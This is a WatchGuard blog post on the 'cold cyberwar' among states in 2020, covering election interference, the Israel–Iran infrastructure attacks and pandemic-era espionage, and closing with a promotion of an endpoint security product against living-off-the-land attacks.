WatchGuard Blog

The cold cyberwar and geopolitics: which weapons can protect endpoints?

Following World War II, the technological and arms race that began between the United States and the Soviet Union became known as the Cold War. The Cold War nowadays has entered into a new phase: cyberwarfare. Technology is increasingly being used to gain a competitive edge in global geopolitics, and governments are increasingly concerned about the strength of national defenses against foreign intelligence agencies and attacks from other countries.

The three leading players in the current scenario are the United States, China, and Russia, and 2020 has already been a busy year, with cyberattacks used as a launchpad for espionage, disinformation campaigns, and even simply financial gain.

U.S. intelligence agencies, for instance, have gathered evidence that Russian, Chinese, and Iranian state agents have been using social media and other campaigns, including spam, to spread misinformation in the United States and interfere with presidential elections. They have also specifically accused six Russian citizens of this type of hacking. There are many other examples: UK intelligence services found that Russian agents had been plotting to disrupt the -now canceled- Tokyo Olympics. State-sponsored groups have been accused of attempting to infiltrate several health organizations working on coronavirus vaccines. Microsoft and other agencies have been fighting to close down a botnet used in election interference. Chinese operatives have also been accused of politically motivated hacking of diplomats and NGOs. And governments such as North Korea's have been accused of using ransomware for financial gain.

The year 2020 has also stood out for the cyberwar between Israel and Iran. "It is another common type of conflict," Arik Brabbing, former head of the Israel Security Agency's SigInt and Cyber Division told the Washington Post, neither personally confirming nor denying that, following a recent cyberattack by Iran on Israeli water supply infrastructure, there was a retaliatory attack on the control systems of a major Iranian port, disrupting activities in and around the port for many weeks. Regarding the attack on the water supply system, Brabbing confirmed that it was part of the strategic infrastructure of the State of Israel, controlled by the Israeli National Cyber Directorate (INCD), and added that the worst part was that it was not identified early enough and exposed the weakness of cyberdefenses.

As global tensions rise and cyber weapons evolve, it seems clear that cyberwar activity is taking place with no agreed conventions between countries. Moreover, the complexities involved in attributing responsibility for attacks further exacerbates existing geopolitical tensions. And as the world adopts 5G technology, the consequences, scale, and scope of digital attacks could increase exponentially.

These are some of the issues that led the World Economic Forum to identify cyberattacks as the greatest non-environmental threat to humanity. The World Economic Forum's 2018 Global Risk Report warned that "the use of cyberattacks to target critical infrastructure and strategic industrial sectors (…) could trigger a breakdown in the systems that keep societies functioning," and this warning was repeated in the 2019 and 2020 reports. Cyberwarfare has undeniably become a major concern for businesses and the economy, yet not everyone is ready to deal with it.

What role has the COVID-19 pandemic played in the evolution of threats?

The COVID-19 pandemic has been accompanied by another associated threat: cyberterrorism. Online attacks on highly vulnerable and sensitive state agencies and systems have increased during the coronavirus crisis, including hospitals or scientific research laboratories, as well as other essential utilities for businesses and consumers, such as infrastructure networks and electricity, gas, or water systems.

According to Corey Nachreiner, Chief Technology Officer, "the COVID-19 pandemic has not had a major impact on cyberwarfare. The Cold Cyberwar had already initiated before the pandemic, and while it offers new opportunities to spread misinformation, it doesn't change the political landscape that drives these conflicts in the shadows. Having said that,” he adds, “we have witnessed state-sponsored hackers leveraging the pandemic, primarily targeting organizations that may be researching a vaccine. We assume that this is more down to countries trying to gain an advantage in vaccine development, rather than actually attacking the country itself."

"Living-off-the-Land" attacks in cyberwarfare

One factor that has greatly aided these cyberwarfare attacks is that they don’t require malware to be installed on target systems, but can be perpetrated through seemingly trusted programs.

Living-off-the-Land’ attacks take advantage of legitimate tools that are already on operating systems in order to gain control of systems. Smart adversaries do this as these legitimate tools are less likely to be recognized as malicious by security systems. Fortunately, however, advanced cybersecurity solutions such as Adaptive Defense 360 are available on the market. They combine endpoint protection and detection technologies with 100% process classification services, in order to prevent these ‘Living-of-the-Land’ attacks from occurring. Tools such as these provide detailed visibility into all activity across all endpoints, complete monitoring of running processes, and ultimately, reduction of the attack surface.